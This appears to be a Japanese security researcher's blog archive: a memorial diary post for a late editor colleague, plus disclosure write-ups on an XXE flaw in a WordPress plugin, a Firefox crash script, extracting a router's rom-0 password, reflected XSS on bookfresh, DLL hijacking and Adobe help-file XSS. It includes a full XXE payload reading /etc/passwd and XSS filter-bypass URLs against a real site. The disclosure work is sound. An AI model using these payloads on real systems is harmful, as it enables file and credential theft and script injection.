岡本君のこと   1 comment

Posted at 9:35 pm in diary

岡本君が死んでしまったらしい。
今、告別式から帰ってきたところなんだけど、まだ実感がなく、信じられない。

岡本君と最初に会ったのは彼が今は休刊してしまった「ハッカージャパン」誌のアルバイトの面接に来たときで、なんというか当初の印象は「普通の人」だった。この「普通の人」というのはかなりハードルが下がったもので、ちゃんと会話ができて(コアタイムギリギリの)13時に出社していきなりご飯食べながら新聞を読まないというレベルだ。日給7000円のハッカームック(まだ定期刊行物ですらなかった)というよくわからないものに応募するなんて人はだいたい何かが足りない人だったのだ。面接の後、ボスとようやく「普通の人」がやってきた、と喜んで来てもらうことになったのだった。

岡本君はその後順調に編集者への道を歩み、定期刊行物となり、僕が退職した後も「ハッカージャパン」誌を休刊まで支え続けることとなった。

彼は編集者としても普通の人で、10年以上白夜書房勤めてはいたものの、悪いこともないけれども特に目覚ましい成果というものもなかった。最初に企画して出版されたのは「2ちゃんねる中毒」という書籍で、2ちゃんねるの権利関係で揉めたりいろいろあって半分くらいの原稿を自分で書く羽目になっていた。ハッカージャパン本誌の仕事もあって死ぬほど忙しかったので原稿もボロボロで最後ギリギリで青焼きが出てからたくさんのミスがあってQuarkのデータを直接修正した記憶がある。

彼は「2ちゃんねる」の書籍を企画するくらいなので、職場でも家でも常にネットを見続けていた。ミワタソ祭りとかで盛り上がった記憶がある。その頃からすでに「hagex」としての活動をしており、会社の僕の隣でサイトを更新していたこともあった。そんなことが許される会社だった。

僕が退職してからも交流は続き、仕事を振り振られる間柄となった。つまるところ自分で書くほどの余裕はないけど誰がライターでもいいような個性のいらない原稿を気軽に頼める相手ということだ。

ぼくは「山本洋介山」などのペンネームを使い、彼は「江原顕雄」などのペンネームを使っていた。ペンネームはお互い会社バレが面倒だったからだ。

もともと彼は「危ない一号」とか根本敬なんかを読みながらテクノを聞くゴリゴリのサブカル少年で、基本的にはネットには書けないゲスい話が大好きで、打ち合わせのたびに誰かの噂話だったり不幸になってる話だったりネットで掘ったヤバイ情報だったり自分が追いかけてるヤバい奴の話をしたりしてた。

ぼくは転職先でサラリーマンをしながら「ハッカージャパン」で原稿を書き続け、「2ちゃんねる公式ガイド」の編集者を紹介されて原稿を書いたりもした。彼には自分がそのころ連載していた@ITの編集者を紹介してそこで原稿を書くようになり(現在も原稿が読めます。アイティメディアいい会社ですね!)、晋遊舎で一緒にムックを書いたりもした。

そして再度転職した出版社では「ネットでライフハック」という別の仕込みの間を埋めるために作った書籍を共著者の一員として書いてもらったり、その後ブームの残り火で作ることになった「セカンドライフマガジン」ではPCのレビューや穴埋めの原稿を書いてもらったりした。「セカンドライフマガジン」のWebにも寄稿してもらった気もする。ぼくは身体を壊すほど忙しかったが、合間を縫って「セカンドライフ」の原稿をハッカージャパンに書いた。

身体を壊したぼくはフリーになった。これまでにも増して「ハッカージャパン」に、誰も書く人がいないときにとりあえず岡本君には荒く使われ、たくさんの原稿を書かされるようになった。とはいえこのとき誰かの代打として書いたWebアプリケーションセキュリティの原稿が今の仕事に繋がっているのだから、世の中何があるかわからない。

代わりといっては何だが、岡本君にはぼくのそのときの主な収入源となっていた資格試験の問題作成の下請けをしてもらっていた。関わってた「インストールマニアックス」の数合わせに参加してもらったりもした。そしてハッカージャパンムックとして一緒に編集して原稿もいっぱい書いた「無線LAN教科書」シリーズは割と当たり、内容にそれほど変化がないにもかかわらず都合6年も続くことになった。

そしてハッカージャパンが休刊し、似たようなタイミングで岡本君はスプラウトに転職し(その前から準備の話は聞いてたので、なくなったから辞めたわけではなかった)、ぼくは今のWeb脆弱性診断の仕事をするようになった。5年くらい前のことだ。

その後も交流は続き、ぼくは岡本君に頼まれてスプラウトで講演をしたり、バグバウンティサイトを作るから参加してくれと言われて参加したりした。出る人いないからと言われてテレビにも出た。最後に会社の都合でモザイクかけられて、誰だよあの仮名付けた奴と笑ったりもした。

そんな中で彼は「hagex」としての活動も手を広げていった。打ち合わせのたびに、あのブログ、PVだけはあるんだけど誰もバナークリックしないからちっと儲からないんですよ、とグチをこぼしていたのだが、広告ではなくサイゾーなどでWebの連載を得たり単著の書籍を出したり、こじらせ女子とイベントしたり、阿佐ヶ谷ロフトでイベントしたりと徐々に知名度を上げていった。

最後に会ったのは3月だった。次の仕事で必要となる資格の講習を受けにうちの近所に来たので会いませんかということで、いつも打ち合わせに使っていた駅前のトリアノンだった。財務的な話とかリソースの話とか懸念点を伝えると、しばらくは会社員しながら並行していろいろやるからなんとかなるんじゃないかと話していた(とか言ってたけど7月に辞める予定だということを聞いた)。

そして、阿佐ヶ谷ロフトの自分メインのイベントのチケットがまだ三枚しか売れてないんですよ暇ですか近所ですよね?と聞かれた。心配で当日LINEしたら「売れたので大丈夫です」と返事が来た。そんな男だった。帰り間際にうちの奥さんが某漫画家とトラブルになった話をしたら、目を輝かせて「それ今日の話の中でいちばんいい話ですよ!東内さんの名前出さないからいつかサイトに書いていいですか?」と聞かれたのが最後の話題になるとは思わなかった。

なにぶん、まだ実感がないとか書いてるのだけど、一昨日、海浜幕張からの帰りの電車の中で、通夜と告別式の日程が送られてきたとき、たしか前にVladさんが亡くなったとき、岡本君と行く時間とか合わせて一緒に行ったから、電話して相談するかと思ったんだけど、そうか、もう、いないんだ、電話に出ないんだ、と気付いたときには、ぼろぼろ涙がこぼれたんだった。

Written by bogus on 6月 27th, 2018

ちょっとだけ複雑なXXEの話   no comments

Posted at 12:27 pm in Security

お久しぶりです。もう年末ですね。

OWASP top 10 2017が発表されて、その中にXXEとデシリアライゼーションが新たにランクインしたことがWebセキュリティクラスタでは話題のようです。そもそもXXEもデシリアライゼーションの脆弱性もあまり診断業務では見かけないものなのでどうして入ったのかという驚きもあるのでしょう。

先月までは日本ではあまり話題に上ることは少なかったXXEですが、この数年海外では脆弱性報告をわりと見かけます。自分もいくつか報告をしているのですが、それほど重要度が高くないと認識されているのか修正されることは少なく1つがようやく修正されただけです(他の件は実際に悪用される危険は本当に少ないと思いますが)。

XXEの基本的な原理についてはすでにいくつかのところで説明されているようですので、ちょっとだけ複雑だった修正された事例を紹介したいと思います。

○ExcelファイルのXXE
XXEですが、xml形式のリクエストを行う、またはxmlファイルを読み込ませることで攻撃を行うということが多いのですが、表向きは他のファイル形式だけど実はXMLだというファイルを使うことで攻撃が行えることもあります。

実例として先月脆弱性が修正された
WordPress用プラグイン TablePressにおける XML 外部実体参照 (XXE) 処理の脆弱性
http://jvn.jp/jp/JVN05398317/index.html
がありますので紹介させていただきます。

これはExcelのファイルをWordPressに取り込むプラグインなのですが、現行のExcelで採用されているファイル形式であるxlsxファイルを読み込むことでサーバー内の任意のファイルを読み込むことができるという脆弱性でした。

xlsxというファイルは実はZIP圧縮されたXMLファイルの集合体です。手元のファイルに.zipの拡張子を付けて解凍してみるといくつかのフォルダとxmlファイルとなることがわかるでしょう。

解凍したxlsxファイル

 

攻撃を行うためには解凍した中のどれかのxmlファイルを開き、サーバー内のファイルを読み込むようなDOCTYPE宣言と実体参照を追記して保存します。

 

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"
 count="1" uniqueCount="1"><si><t>&xxe;</t>
<phoneticPr fontId="1"/></si></sst>

 

そして再圧縮すると攻撃するためのxlsxファイルができ上がりました。
簡単ですね。
このファイルをインポートすると以下の図のようにサーバー内のファイルが表示されます。

/etc/passwdが読み込まれた

WordPressのプラグインにはこのようにxmlの処理の際に内部ファイルを読み込むような機能があるのですが、これだけで大騒ぎしてはいけません。
WordPressはAdminister権限でログインしている場合、任意のphpコードの実行が可能です。ですのでAdminister権限でこのようなことができるからといって脆弱性だと決めつけることはあまりよろしくはないです。

ですが、このプラグインの場合は管理権限のないユーザーであってもこの機能を使用することができましたので、管理権限のないユーザーがサーバー内の任意ファイルを読み込むことができるという由々しき脆弱性として報告/修正されました。

実は修正の方向としてはこの機能を管理者しか使えなくするという方法もあったのだと思いますが本編とは関係ないのでこれ以上は言及しません。

ですが、管理者しか使えない場合であってもこのxlsxファイルが外部の悪意ある人の作成したもので、読み込んだファイルの内容を外部に送信されるような機能がある場合どうなるでしょう。その場合ファイルをインポートすると知らずにサーバー内のファイルを攻撃者のサーバーに送信してしまうということになります。
送信させる手段としては古い環境(libxml2.8未満?)なら属性値を使った攻撃が可能です。新しい環境なら他のプラグインのXSSを使うというやり方などがあると思いますが、疲れたのでこの話はここまでにします。

なおxmlではないのに実はxmlであるものとしては、Office関連のファイル以外にもepubファイルやxspf形式のファイルなどがありますので皆様も試してみるのはいかがでしょうか。

 

Written by bogus on 12月 2nd, 2017

CVE-2017-7755 Firefox のインストーラーと同一ディレクトリー上の DLL ファイルを通じた特権昇格   no comments

Posted at 4:48 pm in internet,Security

こんにちは。お久しぶりです。
twitterまとめにかまけてすっかりこちらを忘れておりました。

更新しないうちに家のウォシュレットが壊れたりハクビシンに天井裏に住まれて糞尿を垂れ流されたりしておりましたが何とか生きています。猫も元気です。

それはともかく生まれて初めてMozillaの脆弱性を見つけて報奨金をいただきました。我ながらすごいですね。きっと最初で最後だと思いますのでこうしてブログに書くわけです。端的にいうと自慢です。

http://www.mozilla-japan.org/security/announce/2017/mfsa2017-15.html#CVE-2017-7755

で、どんな脆弱性かというと去年あたりからIPAでもたくさん報告されているDLLハイジャックとかバイナリプランティングとかいろいろな呼び名のあるDLL読み込みの脆弱性です。

インストーラーと同じフォルダにDLLを置いておくとインストーラーを実行したときに想定されているDLLに優先されて同じフォルダのDLLが読み込まれて、想定外の電卓が実行されるというかんじですね。Firefoxをインストールしようとするとインストールできずに電卓が起動するなんて、Mozillaとしては非常に気分が悪いということだったかはわかりませんがFirefox54のリリースで修正されました。

どんなDLLをどうやって…という詳細については残念ながらFirefox以外でまだ修正されていないソフトがあるのに加え過去バージョンはそのままですので今のところ伏せさせていただきます。探せばわかると思いますが。

ちなみに報奨金もいただけることになっています。ありがたいことです。

きたでー #bugbounty #mozilla

</script><svg/onload=alert(1)>さん(@yousukezan)がシェアした投稿 –

修正前やプライベートバウンティだったりして詳しくは書けないのですが、これ以外にもDLL読み込みに関する脆弱性によっていくつかの会社から報奨金をいただいております。こんな単純な脆弱性と馬鹿にしたりしてる人やOSの仕様だから脆弱性じゃないと思っている皆さまも探してお小遣い稼ぎにチャレンジしてみてはいかがでしょうか。

Written by bogus on 6月 17th, 2017

マルウェア感染お詫びページのXSS   no comments

Posted at 12:30 am in internet,Security

この記事は「脆弱性”&'<<>\ Advent Calendar 2015」n日目の記事です。

一般社団法人海外産業人材育成協会(HIDA)というところのマルウェア感染のお詫びページにDOM based XSSがありました。

refererを書き出していたのですが、エスケープしていなかったことによるDOM based XSSですね。

hida

Enjoy!(一度やってみたかった)

Written by bogus on 12月 29th, 2015

ブロードバンドルーターをヤフオクで買った話   no comments

Posted at 12:30 am in computer,internet,Security

この記事は「脆弱性”&'<<>\ Advent Calendar 2015」9日目の記事です。

お久しぶりです。

しばらくブログを放置しているうちに猫が2匹になりました。

1匹目と同じような三毛猫ですが、分裂したわけではなく拾ったのです。

3ヵ月経ちました

3ヵ月経ちました

そんな猫かわいい話は置いといて、最近人と話していたときに、もう変なものは買ってないのですか? と聞かれたので、自分も変なものを買う人として認識されているのだなあとびっくりしたのですが(毎週のように変なものを買っていた橋本和明さんみたいなのが真の物買いだと思っていました)、そういえば猫がまだ1匹の時にブロードバンドルーターをみんな大好きヤフオクで手に入れたことを思い出したのでそれについて書こうと思います。

●買ったルーター

買ったブロードバンドルーターはバッファローのBLR3-TX4Lという結構昔のもので、落札価格はたしか100円くらいだった思います。もちろん送料のほうが高いですよ。ええ。

ヤフオクで手に入れたルーター

ヤフオクで手に入れたルーターBLR3-TX4L

で、なんでこんなものを買ったのかといいますと、海外ではZyXELという会社のブロードバンドルーターに対する攻撃が大流行だったのです。今も流行しているのかは知りません。

どんな攻撃ができるかというと、rom-0という設定ファイルがリモートから誰でも盗み出せる、ということです。

誰でも盗めると言うことはお子様でも暇なジジババでも簡単にハッカー気分が味わえる(と書くとコメントにハッカーではなくクラッカーヽ(`Д´#)ノ ムキー!!と書かれそうですね)… ではなく実際にハッキングできるというわけで大人気です。

ここまで書いてカンの鋭い人は気づいたと思いますが、実はこのバッファローのブロードバンドルーター、実はZyXELのOEMなのです。

○攻撃してみる

早速実験してみましょう。

長い前フリの割に攻撃方法は簡単です。

http://ルータのIPアドレス/rom-0

にアクセスするとrom-0ファイルがダウンロードされます。やった!

中にはパスワードが… と思ったのですが、バイナリっぽいのでよくわかりません。テキストファイルで開いても読めません!

ダメじゃん!そんなに世の中甘くないです。「ヤフオクごときで簡単にハッキングとかできないんだよこの出来損ないが!」とルーターで頭を殴られたような気がしました。CISCOのルーターなどデータセンターにあるようなごっつい奴だとたぶん薄れゆく意識の中で「ハッキングじゃなくて…」思いつつ死んでいたに違いないのでブロードバンドルーターでよかったと妄想に耽っていたのですが、そんなことしてる場合ではありません。何とかしないと。
何とかしようと思って軽く「rom-0」と目の前に鎮座ましましているgoogle先生に聞いてみると「rom-0 decrypt」と「rom-0 decoder」とかサジェストされます。点の言葉に従うとデコードしてくれるWebサービスが見つかります。世の中ってちょろいもんですね。

Webサービスに先ほどダウンロードしてきたrom-0ファイルを放り込むとパスワードが解析されました。やった!これだけ!passwordというのがこの買ってきたブロードバンドルーターに設定されていたパスワードで、AP…というのがアクセスポイントの名称ですね。

パスワード

解析サイトにファイルをアップロードするとパスワードがデコードされて表示されるのです

やった!世の中なんてチョロいもんですね。これでサッカー選手くらい稼ぐスーパーハッカー間違いなしです。

まあこんな感じでジャンクを買ってきて攻撃してみるのは自分の財布と時間以外は誰にも迷惑かけませんので試してみてはいかがでしょうか。

Written by bogus on 12月 9th, 2015

Firefoxが一瞬でクラッシュする魔法のスクリプト   no comments

Posted at 9:49 am in internet,Security

こんにちは。

世間はお盆ですがまだまだ暑いですね。

変わらず今日も暑いですね

変わらず今日も暑いですね

 

さて先月の話になるのですが、いつものようにXSSを試しているとなぜかFirefoxだけうまくいきません。

何が原因なのかをいろいろ試してみたところ、急にFirefoxがクラッシュするようになりました。
単純化するとこんなコードです。


<html>
<script>
window.location.protocol='javascript'
</script>
</html>
???

ということでWindowsとMacとFirefoxOSのエミュレーターで試してみたのですがやっぱり日頃見かけないクラッシュ画面が出てきます。

試してみたい方はこちらからどうぞ(FF40では修正されているのでそれ以下のバージョンでどうぞ)

なんじゃこりゃ!

ということでMozillaに連絡してみると本当にFirefoxのバグみたいでした。

今クラッシュが起こること確認しているバージョンはFirefox38.0.5〜39.0.3です。Windows、MacOSX、Androidとプラットフォームは問いません。

あとFirefox ESR 38より前のバージョンでもクラッシュが起こるとの報告を受けています(ESR38で修正済み)。あとFirefoxOSでもクラッシュします。

そんなこんなで先月やりとりを行い、Firefox40で修正されたのですが、

どうやらMozillaはセキュリティの問題とは考えてないみたいで、セキュリティ問題修正のリストには掲載されていないようです。

そしてセキュリティの問題と考えていないのですから、もちろんbugzillaでもこのスクリプトは公開されています

1ヶ月近くもゼロデイを公開しても問題無いと思っているMozillaとはセキュリティに対する考え方が違うんだろうなあと思っていますが、彼らのやり方なのでしょうから仕方ありません。

Firefoxには他にも掲載されていないセキュリティの問題が存在しているんだろうなあと想像させられるお盆休みです。

 

Written by bogus on 8月 12th, 2015

パラメータを好きなものに書き換えて送ってくれるsWebMachineGunを使ってみたのでメモ   no comments

Posted at 7:04 pm in XSS

こんにちは。
毎日暑いですね。故郷を思い出します。

暑いですね

暑いですね

さて、日々Webの診断を行っておりますが、会社の近くに座ってる人がsWebMachineGunという便利なツールを作って公開されていたので使ってみました(導入方法とかは公開サイトの方をご覧ください)。
これは楽ができるかもということで診断の仕事でも使おうと思うのですが、どうにも忘れっぽいので備忘録代わりにメモ書きを残しておこうと思います。

まだざっくりとしか使ってないので間違い等あるかもしれません。そのときはお気軽にご指摘いただけると助かります。

●ざっくり何ができる?

いろいろパラメータを変更したHTTPリクエストを半自動的に発行して、結果を受け取ることが可能です。受け取った結果をいろいろ見て脆弱性発見の助けになるかもしれません。もちろんHTTPSにも対応していますよ。他にもいろいろできるみたいですがまだちょっとわからないのでもうちょっと使いこなしてからですね。

Read the rest of this entry »

Written by bogus on 8月 5th, 2015

ゴールデンウイーク前後にカジュアルにサイボウズの脆弱性を探してみた   no comments

Posted at 2:38 pm in internet,Security

お久しぶりです。最近は立派な社畜としてのんびり生きています。こんにちは。一度は逃げた猫も、外?何それ?知らんし!とすっかり引きこもっています。

さいきんの我が家

さいきんの我が家

にしむねあさんがカジュアルに脆弱性を見つけてたくさんお金を稼いでいらっしゃるようなので(とはいえ読んだらちっともカジュアルじゃない!騙された!焼肉!)、私もそれに触発されてゴールデンウイーク前後にカジュアルな脆弱性探しにチャレンジしてみました(惜しくもゴールデンウイーク中はゴロゴロしたり猫と遊んでるうちに終わってしまいました)。

で、報告したものの脆弱性と認められずにお金を稼げなかったものがたくさんあったので、それについて書かせていただきます。カジュアルに報告した中で脆弱性と認められたものも実はあったりしましたが、それについては現在進行中のため書くことができません。あしからず。

Read the rest of this entry »

Written by bogus on 5月 23rd, 2015

bookfreshのXSSのはなし   no comments

Posted at 9:28 am in XSS

bookfreshのXSSを見つけて報告したけどDuplicateだったのでメモ。

モバイルサイトの方に反射型XSSがあったので報告しました。
便宜上FirefoxでUAをいじったものですが、Android版のFFで発動します。

ログインするとダッシュボードが表示されますが、ここには目もくれず
メニューの一番上の「Appointments」をクリックします。
いくつかまたメニューが表示されるのですが、それは置いといて一番下の
「Switch to Desktop Mode」というリンクがあります。

https://www.bookfresh.com/index.html?view=history&o=r&full_site=yes

みたいなURLですが、このfull_siteパラメータに問題があります。

とりあえず、
https://www.bookfresh.com/index.html?view=history&o=r&full_site=yes%22%3E%3Cs%3E
のようにyesの後ろに”><s>を付けてみますが特に何も起きません。

特に何も起きないのですが、メニューをクリックするとあら不思議。
打ち消し線が入っているのがわかります。

ソースを見るとエスケープされていないのがわかります。

なので、yes”><script>alert(0)</script>とかやってみますよね。
しかしながら<script>は[removed]になってしまいます。

つぎはyes” onmouseover=alert(0)//を試してみましょう。
alert&#40;0&#41;になってしまいます。

ギャー

ということで
https://www.bookfresh.com/index.html?view=merchant_accept_decline&id=f636e80330a24850e170cc08bd80c715&enable=1&done=view%3Dhistory%26o%3Dr%26full_site%3Dyes%2522%2520onmouseover%3Dlocation%3D%2527java%2527%2B%2527script\x3aal%2527%2B%2527ert%26%2340%3B0%26%2341%3B%2527%2F%2F&done_name=Reservations

https://www.bookfresh.com/index.html?view=merchant_accept_decline&id=f636e80330a24850e170cc08bd80c715&enable=1&done=view%3Dhistory%26o%3Dr%26full_site%3Dyes%2527%3B%2522%253E%253Cs%253C%2Fscript%253E%2520onmouseover%3Dlocation%3D%2527java%2527%2B%2527script\x3aal%2527%2B%2527ert\x28location\x29%2527%2F%2F&done_name=Reservations

https://www.bookfresh.com/index.html?view=merchant_accept_decline&id=f636e80330a24850e170cc08bd80c715&enable=1&done=view%3Dhistory%26o%3Dr%26full_site%3Dyes%2527%3B%2522%253E%253Cs%2520onmouseover%3Dlocation%3D%2527java%2527%2B%2527script\x3aal%2527%2B%2527ert\x28location\x29%2527%2F%2F&done_name=Reservations

Written by bogus on 5月 18th, 2015

ちょっと前のAdobeのヘルプファイルのXSSについて   5 comments

Posted at 9:23 am in XSS

この記事は 脆弱性”&'<<>\ Advent Calendar 2014 11日目の記事です!

こんにちは。皆様いかがお過ごしでしょうか。お久しぶりです。

私はフリー→派遣社員→無職→会社員と1年で4つも立場が変わりましたが、何となく脆弱性を見つけて日々過ごしています。あとネコを亡くして新しく迎え入れて逃げられて帰ってきて、というこちらについても怒涛の一年でした。毎年今年こそは平穏無事な日々を、と思っておりますが、なかなかそういうわけにもいきません。

ようやく落ち着いてきました

ようやく落ち着いてきました

 

さて、12月になって脆弱性 Advent Calendar 2014という興味深いものが日々公開され続けています。わたしも1つくらいは書けたらいいなあと思ってブログの下書きを見返したところ、なにやら書きかけのものがあったので、これを公開すればいいかなあと思ったのですが、惜しくもすでに24日を除いて全部埋まっておりました。イブに公開するほど大したものでもありませんのでひっそりと公開させていただきます。(とtwitterで書いてたら@hasegawayosukeさんに枠を1つ譲っていただきました。わーい。)

で、早速脆弱性の話なのですが、IPAから[複数の Adobe 製品のヘルプページにおけるクロスサイトスクリプティングの脆弱性(http://jvn.jp/jp/JVN84376800/)]が9月にようやく公開されたので、ちょっと時間は立ってしまいましたがこれについて書きます。報告したのは2012年の11月なのでおよそ2年前ですね。端的に書くと、Adobeのアプリにはそれぞれ中にヘルプページが入っているわけですが、このページにDOM based XSSがあって、location.searchだったかの扱いに問題があります。frameタグの中にそのまま書き出してる系ですね。

影響を受けるシステムはAdobe Acrobat 9.5.2 およびそれ以前とColdFusion 8.0.1 およびそれ以前、となっていますが、実際手元で確認したのがこの2つのパッケージだっただけだということで、実際はこの2つと同時期に流通していたAdobeのかなりの種類のアプリ(というかほぼ全部)が該当するはずです。具体的にはInDesign5とかイラレ8とかFlash10とかそのあたりです。

 

ローカルファイルのXSS

ローカルのヘルプファイルにあるXSS

 

他のパッケージにも脆弱性があると強く思っている理由は、過去(一部現在も)Adobeのサイトにそれらアプリケーションのヘルプファイルが置かれていたのですが、そこに上記のXSSが存在していたからです。普通に考えると同じ製品版にもあるに決まってますよね。

で、XSSの詳細について書こうと思ったのですが、ちょっと参照してみるとまだ脆弱性のあるページがAdobe.comにあったので詳細は差し控えます。言われたところしか修正しない会社って意外と多い気がします。

AdobeのサイトにあったXSS(これは修正されている)

AdobeのサイトにあったXSS(これは修正されている)

またColdFusionのサポートを見てもアップデートが出ている様子もなく、JVNのAdobeからの情報によるとThis issue is no longer reproducible in currently supported products.とのことなので、サポート外で放置なのかもしれません。とりあえずこのへんの古いバージョンのAdobeのアプリを使ってる人はfile:// の変なリンクをクリックしない方がいいと思います(ColdFusionの場合http://でも影響ありますが)。あと書き忘れていましたがWindows版のみでMac版は大丈夫だと思います。

Written by bogus on 12月 11th, 2014